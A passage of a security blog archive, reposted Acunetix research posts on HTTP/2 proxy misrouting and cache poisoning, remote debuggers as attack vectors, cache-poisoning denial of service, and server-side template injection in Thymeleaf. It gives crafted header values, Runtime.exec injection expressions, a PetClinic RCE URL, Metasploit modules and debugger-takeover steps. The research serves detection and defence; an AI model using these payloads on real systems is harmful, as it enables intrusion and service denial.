header is a field consisting of length and data. There is no longer a
need to parse data on the basis of special characters.</p>
<p>HTTP/2 has four required headers called <em>pseudo-headers</em>. These are <em>:method</em>, <em>:path</em>, <em>:scheme</em>, and <em>:authority</em>.
Note that pseudo-header common names start with a colon, but these
names are not transmitted – instead, HTTP/2 uses special identifiers for
each.</p>
<ul><li><em>:method</em> and <em>:path</em> are straight analogs of the method and path in HTTP/1.1.</li><li><em>:scheme</em> is a new header that indicates which protocol is used, usually <em>http</em> or <em>https</em>.</li><li><em>:authority</em> is a replacement for the <em>Host</em> header. You are allowed to send the usual <em>Host</em> header in the request but <em>:authority</em> has a higher priority.</li></ul>
<h2>Misrouting and SSRF</h2>
<p>Today’s web applications are often multi-layered. They often use
HTTP/2 to interact with user browsers and HTTP/1.1 to access backend
servers via an HTTP/2 reverse proxy.
As a result, the reverse proxy must convert the values received from
HTTP/2 to HTTP/1.1, which extends the attack surface. In addition, when
implementing HTTP/2 support in a web server, developers may be less
strict about the values in various headers.</p>
<h3>Envoy Proxy</h3>
<p>For example, when I was doing research for the talk <a href="https://speakerdeck.com/greendog/2-and-a-bit-of-magic" rel="noopener" target="_blank">“Weird proxies/2 and a bit of magic” at ZeroNights 2021</a>, I found that the Envoy Proxy (tested on version 1.18.3) allows you to use arbitrary values in <em>:method</em>, including a variety of special characters, whitespace, and tab characters. This makes misrouting attacks possible.</p>
<p>Let’s say that you specify <em>:method</em> to be <code>GET http://virtualhost2.com/any/path?</code> and <em>:path</em> to be <code>/</code>. Envoy sees a valid path <code>/</code>
and routes to the backend. However, when Envoy creates a backend
request in the HTTP/1.x protocol format, it simply puts the value from <em>:method</em> into the request line. Thus, the request will be:</p>
<pre><code class=" hljs http"><span class="hljs-request">GET <span class="hljs-string">http://virtualhost2.com/any/path?</span> / <span class="hljs-string">HTTP/1.1
Host:</span> virtualhost.com</span>
</code></pre>
<p>Depending on the type of backend web server, it can accept or reject
such a request (because of the extra space). In the case of nginx, for
example, this will be a valid request with the path <code>/any/path? /</code>. Moreover, we can reach an arbitrary virtual host (in the example, <code>virtualhost2.com</code>), to which we otherwise would not have access.</p>
<p>On the other hand, the Gunicorn web server allows arbitrary values
in the protocol version in the request line. Therefore, to achieve the
same result as with nginx, we set <em>:method</em> to <code>GET http://virtualhost2.com/any/path HTTP/1.1</code>. After Envoy processes the request, it will look like this:</p>
<pre><code class=" hljs ruby"><span class="hljs-constant">GET</span> <span class="hljs-symbol">http:</span>/<span class="hljs-regexp">/virtualhost2.com/any</span><span class="hljs-regexp">/path? /</span> <span class="hljs-constant">HTTP</span>/<span class="hljs-number">1.1</span> / <span class="hljs-constant">HTTP</span>/<span class="hljs-number">1.1</span>
</code></pre>
<h3>Haproxy</h3>
<p>A similar problem exists in Haproxy (tested on version 2.4.0). This reverse proxy allows arbitrary values in the <em>:scheme</em> header. If the value is not <code>http</code> or <code>https</code>, Haproxy puts this value in the request line of the request sent to the backend server. If you set <em>:scheme</em> to <code>test</code>, the request to the web server will look like this:</p>
<pre><code class=" hljs http"><span class="hljs-request">GET <span class="hljs-string">test://virtualhost.com/</span> HTTP/1.1</span>
<span class="hljs-attribute">Host</span>: <span class="hljs-string">virtualhost.com</span>
</code></pre>
<p>We can achieve a similar result as for Envoy by simply setting :scheme to <code>http://virtualhost2.com/any/path?</code>. The final request line to the backend will be:</p>
<pre><code class=" hljs ruby"><span class="hljs-constant">GET</span> <span class="hljs-symbol">http:</span>/<span class="hljs-regexp">/virtualhost2.com/any</span><span class="hljs-regexp">/path?:/</span><span class="hljs-regexp">/virtualhost.com HTTP/</span><span class="hljs-number">1.1</span>
</code></pre>
<p>This trick can be used both to access arbitrary virtual hosts on the
backend (host misrouting) and to bypass various access restrictions on
the reverse proxy, as well as to carry out SSRF attacks on the backend
server. If the backend has an insecure configuration, it may send a
request to an arbitrary host specified in the path from the request
line.</p>
<p>The latest release of Acunetix has checks that discover such SSRF vulnerabilities.</p>
<h2>Cache poisoning</h2>
<p>Another common vulnerability of tools that use the HTTP/2 protocol is cache poisoning.
In a typical scenario, a caching server is located in front of a web
server and caches responses from the web server. To know which responses
are cached, the caching server uses a key. A typical key is <em>method + host + path + query</em>.</p>
<p>As you can see, there are no headers in the key. Therefore, if a web
application returns a header in a response, especially in an unsafe way,
an attacker can send a request with an XSS payload in this header. The
web application will then return it in the response, and the cache
server will cache the response and return it to other users who requests
the same path (key).</p>
<p>HTTP/2 adds new flavors to this attack. They are associated with the <em>:scheme</em>
header, which may not be included in the key of a cache server, but
through which we can influence the request from the cache server to a
backend server as in the misrouting examples.</p>
<p>The attack may also take advantage of <em>:authority</em> and <em>Host </em>headers. Both are used to indicate the hostname but the cache server may handle them incorrectly and, for example, use the <em>Host</em> header in the cache key, but forward the request to the backend using the value of the <em>:authority</em> header. In such case, <em>:authority</em> will be an unkeyed header and an attacker can put a payload for cache poisoning attack in it.</p>
<h3>Cache poisoning DoS</h3>
<p>There is also a variation of the cache poisoning attack called the <em>cache poisoning DoS</em>.
This happens when a cache server is configured to cache error-related
responses (with a response status 400, for example). An attacker can
send a specifically crafted request which is valid for the cache proxy
but invalid for the backend server. It’s possible because servers parse
requests differently and have different restrictions.</p>
<p>HTTP/2 offers us a fairly universal method for this attack. In
HTTP/2, to improve performance, each cookie is supposed to be sent in a
separate cookie header. In HTTP/1.1, you can only have one <em>Cookie</em>
header in the request. Therefore, the cache server, having received a
request with several cookie headers, has to concatenate them into one
using <code>;</code> as a separator.</p>
<p>Most servers have a limit on the length of a single header. A typical
value is 8196. Therefore, if an attacker can send HTTP/2 request with
two cookie headers with a length of 5000, they do not exceed the length
and will be processed by a cache server. But the cache server
concatenates them into one <em>Cookie</em> header, so the length of the <em>Cookie</em>
header for the backend is 10000, which is above the limit. As a result,
the backend returns a 400 error. The cache server caches it and we have
a cache poisoning DoS.</p>
<p>The latest release of Acunetix includes checks for both web cache poisoning and CPDoS via HTTP/2.</p>
<h2>More HTTP/2 in the future</h2>
<p>The vulnerabilities listed above are the most common HTTP/2
vulnerabilities but there are more. We plan to add more checks in future
scanner releases.</p>
<p>If this topic is of interest to you, I recommend looking at the following papers:</p>
<ul><li><a href="https://www.slideshare.net/neexemil/http-request-smuggling-via-higher-http-versions" rel="noopener" target="_blank">HTTP Request Smuggling via higher HTTP versions</a></li><li><a href="https://portswigger.net/research/http2" rel="noopener" target="_blank">HTTP/2: The Sequel is Always Worse</a></li><li><a href="https://speakerdeck.com/greendog/2-and-a-bit-of-magic" rel="noopener" target="_blank">Weird proxies/2 and a bit of magic</a></li></ul>Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-6535953999823213322021-04-23T02:31:00.005-07:002022-08-23T02:44:45.104-07:00Remote debuggers as an attack vector<p> <i>(It's a repost from <a href="https://www.acunetix.com/blog/web-security-zone/remote-debuggers-as-an-attack-vector/">https://www.acunetix.com/blog/web-security-zone/remote-debuggers-as-an-attack-vector/</a>) </i></p><p>Over the course of the past year, our team added many new checks to
the Acunetix scanner. Several of these checks were related to the debug
modes of web applications as well as components/panels used for
debugging. These debug modes and components/panels often have
misconfigurations, which may lead to the disclosure of sensitive
information or even to remote command execution (code injection).</p>
<p>As I was working on these checks, I remembered cases when I
discovered that applications expose a special port for remote debugging.
When I was working as a penetration tester,
I often found that enterprise Java applications exposed a Java Debug
Wire Protocol (JDWP) port, which would easily allow an attacker to get
full control over the application.</p>
<p>When I was writing the new Acunetix checks, I became curious about
similar cases regarding other programming languages. I also checked what
capabilities Nmap has in this respect and found only checks for JDWP.
Therefore, I decided to research this blind spot further.</p>
<h2>Low-hanging fruit</h2>
<p>Every developer uses some kind of a debugging tool but remote
debugging is less common. You use remote debugging when you cannot
investigate an issue locally. For example, you use it when you need to
debug an enterprise Java application that is too big to develop locally
and that has strong connections with the environment or processed data.
Another typical scenario for remote debugging is debugging a Docker
container.</p>
<p>A debugger is a very valuable target for an attacker. The purpose of a
debugger is to give the programmer maximum capabilities. It means that,
in almost all cases, the attacker can very easily achieve remote code
execution once they access the remote debugger.</p>
<p>Moreover, remote debugging usually happens in a trusted environment.
Therefore, many debuggers don’t provide security features and use
plain-text protocols without authentication or any kind of restrictions.
On the other hand, some debuggers make the attack harder – they provide
authentication or client IP restrictions. Some go even further and
don’t open a port but instead initiate the connections to the IDE. There
are also cases when the programmer passes a remote connection to the
debugger through SSH.</p>
<p>Below you can find examples of RCE attacks on various debuggers. I
tried to cover all common languages but focused on the most popular
debuggers only and those that are most commonly misconfigured.</p>
<h2>Attacks on debuggers</h2>
<h3>Java(JVM)/JPDA</h3>
<p>JPDA is an architecture for debugging Java applications. It uses
JDWP, which means that you can easily detect its port using Nmap. The
port is, however, not always the same – it typically depends on the
application server. For example, Tomcat uses 8000, ColdFusion uses 5005.<br />
To gain access to a shell through a successful RCE attack, I used an exploit from Metasploit: <i>exploit/multi/misc/java_jdwp_debugger</i>.</p>
<p>Also note that all other JVM-based languages (Scala, Kotlin, etc.)
also use JPDA, so this presents an attacker with a wide range of
potential targets.</p>
<h3>PHP/XDebug</h3>
<p>XDebug is different from all other debuggers described in this
article. It does not start its own server like all other debuggers.
Instead, it connects back to the IDE. The IP and port of the IDE are
stored in a configuration file.</p>
<p>Due to the nature of XDebug, you cannot detect it and attack it using
a port scan. However, with a certain configuration of XDebug, you can
attack it by sending a special parameter to the web application, which
makes it connect to our IDE instead of the legitimate IDE.</p>
<p>Acunetix includes a check for such a vulnerable configuration. Details of this attack are available on <a href="https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/" rel="noopener" target="_blank">this blog</a>.</p>
<h3>Python/pdb/remote_pdb</h3>
<p>pdb is a common Python debugger and the <i>remote_pdb</i> package
(and other similar packages) enables remote access to pdb. The default
port is 4444. After you connect using ncat, you have full access to pdb
and can execute arbitrary Python code.</p>
<h3>Python/debugpy/ptvsd</h3>
<p>debugpy is a common debugger for Python, provided by Microsoft. There
is also a deprecated version of this debugger called ptvsd.</p>
<p>debugpy uses a debug protocol developed by Microsoft – DAP (Debug
Adapter Protocol). This is a universal protocol that may also be used
for debuggers for other languages. The protocol is similar to JSON
messages with a preceding <i>Content-Length</i> header. The default port is 5678.</p>
<p>Microsoft uses this protocol in VSCode so the easiest way to
communicate using this protocol is by using VSCode. If you have VSCode
with an installed default Python extension, all you need to do is to
open an arbitrary folder in VSCode, click the <i>Run and Debug</i> tab, click <i>Create a launch.json file</i>, choose <i>Python</i>→<i>Remote Attach,</i> and enter a target IP and port. VSCode will generate a <i>launch.json</i> file in the <i>.vscode/</i> directory. Then click <i>Run</i>→<i>Start Debugging</i> and when you connect, you can enter any Python code in the <i>Debug console</i> below, which will be executed on your target.</p>
<h3>Ruby/ruby-debug-ide</h3>
<p>The <i>ruby-debug-ide</i> (<i>rdebug-ide</i>) gem uses a custom but simple text protocol. This debugger typically uses the 1234 port.</p>
<p>To execute arbitrary code, you can use VSCode and follow the same
steps as for Python. Note that if you want to disconnect from a remote
debugger, VSCode sends <i>quit</i> instead of <i>detach</i> (like RubyMine would do), so VSCode stops the debugger completely.</p>
<h3>Node.js/Debugger</h3>
<p>Versions of Node.js earlier than v7 use the Node.js Debugger. This debugger uses the <i>V8 Debugger</i> protocol (which looks like HTTP headers with a JSON body). The default port is 5858.</p>
<p>The Node.js Debugger allows you to execute arbitrary JS code. All you need to do is use Metasploit with the <i>exploit/multi/misc/nodejs_v8_debugger/</i> module.</p>
<h3>Node.js/Inspector</h3>
<p>Newer versions of Node.js use the Node.js Inspector. From the
attacker’s point of view, the main difference is that the WebSocket
transport protocol is now used and the default port is now 9229.</p>
<p>You can use several methods to interact with this debugger. Below you can see how to do it directly from Chrome, using <i>chrome://inspect</i>.</p>
<p><img alt="" class="aligncenter size-full wp-image-30966" height="514" src="https://cdn.acunetix.com/wp_content/uploads/2021/04/debuggers3.gif" width="810" /></p>
<h3>Golang/Delve</h3>
<p>Delve is a debugger for Go. For remote debugging, Delve uses the
JSON-RPC protocol, typically on port 2345. The protocol is quite
complex, so you definitely need to use, at least, delve itself (<i>dlv connect server:port</i>).</p>
<p>Go is a compiled language and I was unable to find a direct way to
achieve RCE as with other languages. Therefore, I recommend that you use
a proper IDE (for example, Goland) because you will have to do some
debugging yourself to be able to achieve RCE. Note that the source code
is not necessary but it comes in handy.</p>
<p>Below is an example of connecting to Delve using Goland.</p>
<p><img alt="" class="aligncenter size-full wp-image-30967" height="469" src="https://cdn.acunetix.com/wp_content/uploads/2021/04/debuggers1.gif" width="910" /></p>
<p>Delve provides a way to invoke functions imported to an application.
However, this feature is still in beta testing and it doesn’t allow to
pass static strings as function arguments.</p>
<p>The good news is that we can change the values of local variables and
pass them to a function. Therefore, we need to pause an application in
a non-runtime thread within a scope that interests us. We can use
standard libraries for that.</p>
<p>Below you can see how to pause an application on a standard HTTP library and invoke the <i>os.Environ()</i> function, which returns the <i>env</i> of the application (possibly containing sensitive data). If you want to execute arbitrary OS commands, you need to execute <i>exec.Command(cmd,args).Run()</i>. However, if so, you need to find and stop in a position with variables of type <i>String</i> and <i>[]String</i>.</p>
<p><img alt="" class="aligncenter wp-image-30968 size-base-thumb-910-x" height="425" src="https://cdn.acunetix.com/wp_content/uploads/2021/04/debuggers2-910x425.png" width="910" /></p>
<h3>gdbserver</h3>
<p>The gdbserver allows you to debug apps remotely with gdb. It has no
security features. For communication, it uses a special plain-text
protocol – the GDB Remote Serial Protocol (RSP).</p>
<p>The most convenient way to interact with this debugger is by using gdb itself: <i>target extended-remote target.ip:port</i>. Note that gdb provides very convenient commands <i>remote get</i> and <i>remote put</i> (for example, <i>remote get remote_path local_path</i>), which allow you to download/upload arbitrary files.</p><p><i> </i></p>Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-23890178771901001382021-01-04T02:27:00.002-08:002022-08-23T02:42:57.808-07:00Cache poisoning denial-of-service attack techniques<p> <i>(It's a repost from <a href="https://www.acunetix.com/blog/web-security-zone/cache-poisoning-dos-attack-techniques/">https://www.acunetix.com/blog/web-security-zone/cache-poisoning-dos-attack-techniques/</a>) </i></p><p>Attacks related to cache poisoning represent a clearly visible web
security trend that has emerged in recent years. The security community
continues to research this area, finding new ways to attack.</p>
<p>As part of the recent release of Acunetix, we have added new checks
related to cache poisoning vulnerabilities and we continue to work in
this area to improve coverage. In this article, I’d like to share with
you a few techniques related to one of the new checks – <i>Cache Poisoning DoS (CPDoS)</i>.</p>
<h2>What Is a Cache Poisoning Denial-of-Service Attack</h2>
<p>In 2019, Hoai Viet Nguyen and Luigi Lo Iacono published a <a href="https://cpdos.org" rel="noopener" target="_blank">whitepaper related to CPDoS attacks</a>.
They explained various attack techniques and analyzed several content
delivery networks and web servers that could be affected by such
attacks.</p>
<p>CPDoS attacks are possible if there is an intermediate cache proxy
server, located between the client (the user) and the web server (the
back end), which is configured to cache responses with error-related
status codes (e.g. <i>400 Bad Request</i>). The attacker can
manipulate HTTP requests and force the web server to reply with such an
error status code for an existing resource (path). Then, the proxy
server caches the error response, and all other users that request the
same resource get the error response from the cache proxy instead of a
valid response.</p>
<p>The whitepaper presents 3 attack types that allow the attacker to force a web application to return a 400 status code:</p>
<ul><li aria-level="1">HTTP Header Oversize (HHO) – when the size of a header exceeds the maximum header length</li><li aria-level="1">HTTP Meta Character (HMC) – when the header of the attacker’s request contains a special “illegal” symbol</li><li aria-level="1">HTTP Method Override (HMO) – when the header of the attacker’s request changes the verb (method) to an unsupported one</li></ul>
<h2>New HHO Attack Tricks</h2>
<p>While analyzing these attacks and working on <a href="https://github.com/GrrrDog/weird_proxies/" rel="noopener" target="_blank">my project dedicated to reverse proxies</a>, I’ve managed to come up with a couple of tricks that can be used to perform an HHO attack.</p>
<p>Basically, an HHO attack is possible when the maximum header length
is defined differently in the cache proxy and the web server. Different
web servers, cache servers, and load balancers have different default
limits. If the cache proxy has a maximum header limit that is higher
than the limit defined in the web server, a request with a very long
header can go through the cache server to the web server and cause the
web server to return a 400 error (which will then be cached by the cache
server).</p><p>For example, the default maximum header length for CloudFront is
20,480 bytes. On the other hand, the default maximum header length for
the Apache web server is 8,192 bytes. Therefore, if an attacker sends a
request with a header that is 10,000 bytes long and CloudFront cache
proxy passes it to an Apache server, the Apache web server returns a 400
error.</p>
<p>However, an HHO attack is possible even if the cache server has the
same header length limit as the web server or one that is a little
lower. There are two reasons for this:</p>
<ul><li aria-level="1">The web server maximum header length limit is a
string length limit. The web servers that I have tested don’t perform
any normalization and probably don’t even parse the header before
applying the length check.</li><li aria-level="1">However, cache proxies send correct (normalized) headers to the back end. <br /></li></ul>
<div style="text-align: left;"><img alt="" class="aligncenter size-base-thumb-910-x wp-image-28329" height="585" src="https://cdn.acunetix.com/wp_content/uploads/2020/12/cpdos_diagram-910x652.png" width="816" /><br /> </div><h2>Same-Limit HHO Attack Example</h2>
<p>A practical HHO attack could be performed as follows:</p>
<ol><li aria-level="1">The attacker sends a request with a header that is 8192 bytes long (including <b>\r\n</b>) but with no space between the header name and the value. For example:<br />
<i>header-name:abcdefgh(…) </i><i><br />
</i>(8192 characters in total)</li><li aria-level="1">The cache proxy checks the length of the header and
finds that it is not more than 8192 characters long. Therefore, it
parses the header and disregards the missing space.</li><li aria-level="1">Then, the cache proxy prepares the correct version of the header to be sent to the web server:<br />
<i>header-name: abcdefgh(…) </i><i><br />
</i>(8193 characters in total)</li><li aria-level="1">The cache proxy does not check that the final length
of the header exceeds 8192 characters and sends the header to the web
server.</li><li aria-level="1">The web server that receives the header sees that it exceeds the limit by one byte, and therefore it returns the 400 error page.</li></ol>
<h2>Similar-Limit HHO Attack Example</h2>
<p>If the cache proxy maximum header length limit is a bit lower than
the web server limit, we cannot use the trick described above (1 byte is
not enough). However, in such a case, we can misuse another feature.</p>
<p>Many proxy servers add headers to requests that are forwarded to the web server. For example, <i>X-Forwarded-For</i>, which contains the IP address of the user. However, if the original request also contains the <i>X-Forwarded-For</i> header, the proxy server often concatenates the original value with the value set by the proxy server (the user IP).</p>
<p>This allows us to perform the following attack:</p>
<ol><li aria-level="1">The attacker sends a request with the following header:<br />
<i>X-Forwarded-For: abcdefgh(…)</i><br />
(8192 characters in total)</li><li aria-level="1">The proxy concatenates this request with its own value:<br />
<i>X-Forwarded-For: abcdefgh(…)12.34.56.78</i><br />
(8203 characters in total)</li><li aria-level="1">The proxy sends the value to the web server, which replies with an error code because the header is too long.</li></ol>
<p>Depending on the type of a proxy and its configuration such added
headers may be different and the lengths of added values may be
different as well. You can check some of them <a href="https://github.com/GrrrDog/weird_proxies/" rel="noopener" target="_blank">on my project page</a>.</p>
<h2>The Impact of CPDoS Attacks</h2>
<p>When we were testing our new CPDoS script on bug bounty sites, we
noticed that many sites are vulnerable to such attacks. However, in some
cases, the impact of the attack is questionable. This is because quite a
few cache proxies are configured to cache responses with error status
codes only for a few seconds, which makes it difficult to exploit.</p><p> </p><p><i> </i></p>Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-51202659517347322722020-07-23T02:20:00.005-07:002022-08-23T02:27:20.273-07:00Exploiting SSTI in Thymeleaf<p> <i>(It's a repost from <a href="https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/">https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/</a> )</i></p><p>One of the most comfortable ways to build web pages is by using
server-side templates. Such templates let you create HTML pages that
include special elements that you can fill and modify dynamically. They
are easy to understand for designers and easy to maintain for
developers. There are many server-side template engines for different
server-side languages and environments. One of them is <a href="https://www.thymeleaf.org/" rel="noopener noreferrer" target="_blank">Thymeleaf</a>, which works with Java.</p>
<p>Server-side template injections (SSTI) are vulnerabilities that let
the attacker inject code into such server-side templates. In simple
terms, the attacker can introduce code that is actually processed by the
server-side template. This may result in <a href="https://www.acunetix.com/blog/articles/code-injection/">remote code execution (RCE)</a>,
which is a very serious vulnerability. In many cases, such RCE happens
in a sandbox environment provided by the template engine, but many times
it is possible to escape this sandbox, which may let the attacker even
take full control of the web server.</p>
<p>SSTI was initially researched by <a href="https://portswigger.net/research/server-side-template-injection" rel="noopener noreferrer" target="_blank">James Kettle</a> and later by <a href="https://github.com/epinna/tplmap" rel="noopener noreferrer" target="_blank">Emilio Pinna</a>.
However, neither of these authors included Thymeleaf in their SSTI
research. Let’s see what RCE opportunities exist in this template
engine.</p>
<h2>Introduction to Thymeleaf</h2>
<p>Thymeleaf is a modern server-side template engine for Java, based on
XML/XHTML/HTML5 syntax. One of the core advantages of this engine is <a href="https://www.thymeleaf.org/#natural-templates" rel="noopener noreferrer" target="_blank"><i>natural templating</i></a>.
This means that a Thymeleaf HTML template looks and works just like
HTML. This is achieved mostly by using additional attributes in HTML
tags. Here is an official example:</p><pre><code class="hljs xml"><span class="hljs-tag"><<span class="hljs-title">table</span>></span>
<span class="hljs-tag"><<span class="hljs-title">thead</span>></span>
<span class="hljs-tag"><<span class="hljs-title">tr</span>></span>
<span class="hljs-tag"><<span class="hljs-title">th</span> <span class="hljs-attribute">th:text</span>=<span class="hljs-value">"#{msgs.headers.name}"</span>></span>Name<span class="hljs-tag"></<span class="hljs-title">th</span>></span>
<span class="hljs-tag"><<span class="hljs-title">th</span> <span class="hljs-attribute">th:text</span>=<span class="hljs-value">"#{msgs.headers.price}"</span>></span>Price<span class="hljs-tag"></<span class="hljs-title">th</span>></span>
<span class="hljs-tag"></<span class="hljs-title">tr</span>></span>
<span class="hljs-tag"></<span class="hljs-title">thead</span>></span>
<span class="hljs-tag"><<span class="hljs-title">tbody</span>></span>
<span class="hljs-tag"><<span class="hljs-title">tr</span> <span class="hljs-attribute">th:each</span>=<span class="hljs-value">"prod: ${allProducts}"</span>></span>
<span class="hljs-tag"><<span class="hljs-title">td</span> <span class="hljs-attribute">th:text</span>=<span class="hljs-value">"${prod.name}"</span>></span>Oranges<span class="hljs-tag"></<span class="hljs-title">td</span>></span>
<span class="hljs-tag"><<span class="hljs-title">td</span> <span class="hljs-attribute">th:text</span>=<span class="hljs-value">"${#numbers.formatDecimal(prod.price, 1, 2)}"</span>></span>0.99<span class="hljs-tag"></<span class="hljs-title">td</span>></span>
<span class="hljs-tag"></<span class="hljs-title">tr</span>></span>
<span class="hljs-tag"></<span class="hljs-title">tbody</span>></span>
<span class="hljs-tag"></<span class="hljs-title">table</span>></span></code></pre><pre><code class="hljs xml"><span class="hljs-tag"> </span></code></pre><p>If you open a page with this code using a browser, you will see a
filled table and all Thymeleaf-specific attributes will simply be
skipped. However, when Thymeleaf processes this template, it replaces
tag text with values passed to the template.</p>
<h2>Hacking Thymeleaf</h2>
<p>To attempt an SSTI in Thymeleaf, we first must understand expressions
that appear in Thymeleaf attributes. Thymeleaf expressions can have the
following types:</p>
<ul><li><code>${...}</code>: Variable expressions – in practice, these are OGNL or Spring EL expressions.</li><li><code>*{...}</code>: Selection expressions – similar to variable expressions but used for specific purposes.</li><li><code>#{...}</code>: Message (i18n) expressions – used for internationalization.</li><li><code>@{...}</code>: Link (URL) expressions – used to set correct URLs/paths in the application.</li><li><code>~{...}</code>: Fragment expressions – they let you reuse parts of templates.</li></ul>
<p>The most important expression type for an attempted SSTI is the first
one: variable expressions. If the web application is based on Spring,
Thymeleaf uses Spring EL. If not, Thymeleaf uses OGNL.</p>
<p>The typical test expression for SSTI is <code>${7*7}</code>. This
expression works in Thymeleaf, too. If you want to achieve remote code
execution, you can use one of the following test expressions:</p>
<ul><li>SpringEL: <code>${T(java.lang.Runtime).getRuntime().exec('calc')}</code></li><li>OGNL: <code>${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}</code></li></ul>
<p>However, as we mentioned before, expressions only work in special
Thymeleaf attributes. If it’s necessary to use an expression in a
different location in the template, Thymeleaf supports <i>expression inlining</i>. To use this feature, you must put an expression within <code>[[...]]</code> or <code>[(...)]</code>
(select one or the other depending on whether you need to escape
special symbols). Therefore, a simple SSTI detection payload for
Thymeleaf would be <code>[[${7*7}]]</code>.</p>
<p>Chances that the above detection payload would work are, however,
very low. SSTI vulnerabilities usually happen when a template is
dynamically generated in the code. Thymeleaf, by default, doesn’t allow
such dynamically generated templates and all templates must be created
earlier. Therefore, if a developer wants to create a template from a
string <i>on the fly</i>, they would need to create their own TemplateResolver. This is possible but happens very rarely.</p><h2>A Dangerous Feature</h2>
<p>If we take a deeper look into the documentation of the Thymeleaf template engine, we will find an interesting feature called <i>expression preprocessing</i>. Expressions placed between double underscores (<code>__...__</code>)
are preprocessed and the result of the preprocessing is used as part of
the expression during regular processing. Here is an official example
from Thymeleaf documentation:</p>
<pre><code class="hljs bash"><span class="hljs-comment">#{selection.__${sel.code}__}</span>
</code></pre>
<p>Thymelead first preprocesses <code>${sel.code}</code>. Then, it uses the result (in this example it is a stored value <i>ALL</i>) as part of a real expression evaluated later (<code>#{selection.ALL}</code>).</p>
<p>This feature introduces a major potential for an SSTI vulnerability.
If the attacker can control the content of the preprocessed value, they
can execute an arbitrary expression. More precisely, it is a
double-evaluation vulnerability, but this is hard to recognize using a
black-box approach.</p>
<h2>A Real-World Example of SSTI in Thymeleaf</h2>
<p><a href="https://github.com/spring-projects/spring-petclinic">PetClinic</a> is an official demo application based on the Spring framework. It uses Thymeleaf as a template engine.</p>
<p>Most templates in this application reuse parts of the <i>layout.html</i> template, which includes a navigation bar. It has a <a href="https://github.com/spring-projects/spring-petclinic/commit/07b9d5aa45a51ce6d2372c46880cad2192da9d07" rel="noopener noreferrer" target="_blank">special fragment (function), which generates the menu</a>.</p>
<pre><code class="hljs perl"><li th:fragment=<span class="hljs-string">"menuItem (path,active,title,glyph,text)"</span> class=<span class="hljs-string">"active"</span> th:class=<span class="hljs-string">"<span class="hljs-subst">${active==menu ? <span class="hljs-string">'active'</span> : <span class="hljs-string">''</span>}</span>"</span>>
<a th:href=<span class="hljs-string">"<span class="hljs-subst">@{_<span class="hljs-number">_</span><span class="hljs-variable">${path}</span>_<span class="hljs-number">_</span>}</span>"</span> th:title=<span class="hljs-string">"<span class="hljs-subst">${title}</span>"</span>>
</code></pre>
<p>As you can see, the application preprocesses <code>${path}</code>, which is then is used to set a correct link (<code>@{}</code>). However, this value comes from other parts of the template:</p>
<pre><code class="hljs xml"><span class="hljs-tag"><<span class="hljs-title">li</span> <span class="hljs-attribute">th:replace</span>=<span class="hljs-value">"::menuItem ('/owners/find','owners','find owners','search','Find owners')"</span>></span>
</code></pre>
<p>Unfortunately, all the parameters are static and uncontrollable by the attacker.</p>
<p>However, if we try to access a route that does not exist, the application returns the <i>error.html</i> template, which also reuses this part of <i>layout.html</i>.
In the case of an exception (and accessing a route that does not exist
is an exception), Spring automatically adds variables to the current
context (model attributes). One of these variables is <i>path</i> (others include <i>timestamp</i>, <i>trace</i>, <i>message</i>, and more).</p>
<p>The <i>path</i> variable is a path part (with no URL-decoding) of
the URL of the current request. More importantly, this path is used
inside the <code>menuItem</code> fragment. Therefore, <code>__${path}__</code> preprocesses the path from the request. And the attacker can control this path to achieve SSTI, and as a result of it, RCE.</p>
<p>As a simple test, we can send a request to <i>http://petclinic/(7*7)</i> and get <i>49</i> as the response.</p>
<p>However, despite this effect, we couldn’t find a way to achieve RCE
in this situation when the application runs on Tomcat. This is because
you need to use Spring EL, so you need to use <code>${}</code>. However, Tomcat does not allow <i>{</i> and <i>}</i> characters in the path without URL-encoding. And we cannot use encoding, because <code>${path}</code>
returns the path without decoding. To prove these assumptions, we ran
PetClinic on Jetty instead of Tomcat and achieved RCE because Jetty does
not limit the use of <i>{</i> and <i>}</i> characters in the path:</p>
<pre><code class="hljs ruby"><span class="hljs-symbol">http:</span>/<span class="hljs-regexp">/localhost:8082/</span>(<span class="hljs-variable">${</span><span class="hljs-constant">T</span>(java.lang.<span class="hljs-constant">Runtime</span>).getRuntime().exec(<span class="hljs-string">'calc'</span>)})
</code></pre>
<p>We had to use <i>(</i> and <i>)</i> characters because after preprocessing the <code>@{}</code> expression receives a string starting with <i>/</i> (for example, <code>/${7*7}</code>), so the expression is not treated as an expression. The <code>@{}</code>
expression allows you to add parameters to the URL by putting them in
parentheses. We can misuse this feature to clear the context and get our
expression executed.</p>
<h2>Conclusion</h2>
<p>Server-side template injection is much more of an issue than it
appears to be because server-side templates are used more and more
often. There are a lot of such template engines, and a lot of them
remain unexploited yet but may introduce SSTI vulnerabilities if
misused. There is a long way from <code>${7*7}</code> to achieving RCE but in many cases, as you can see, it is possible.</p>
<p>As security researchers, we always find it interesting to see how
complex technologies clash and affect each other and how much still
remains unexplored.</p><p> </p>Aleksei Tiurinhttp://www.blogger.com/profile/12130898511014099572noreply@blogger.com0tag:blogger.com,1999:blog-8095956197947792822.post-627778518405148342020-02-27T02:16:00.006-08:002022-08-23T02:26:53.184-07:00The curse of old Java libraries<p><i>(It's a repost from <a href="https://www.acunetix.com/blog/web-security-zone/old-java-libraries/">https://www.acunetix.com/blog/web-security-zone/old-java-libraries/</a>) </i><br /></p><p>Java is known for its backward-compatibility. You can still execute
code that was written many years ago, as long as you use an appropriate
version of Java. Thanks to this feature, modern projects use a wide
range of libraries that have been “tested by time” in production.
However, such libraries are often left unsupported by maintainers for a
long time. As a result, when you discover a vulnerability in a library,
you may find it very hard to report the issue and to warn the developers
who use that library.</p>
<p>Here are a few examples of such problems related to old libraries,
which I recently came across when exploiting vulnerabilities as part of
various bug bounty programs.</p>
<h2>JMX and JMXMP</h2>
<p>JMX (Java Management Extensions) is a well-known and widely-used
technology for monitoring and managing Java applications. Since the Java
deserialization “apocalypse”, it is perceived as quite notorious for
security specialists. JMX uses the RMI protocol for transport purposes,
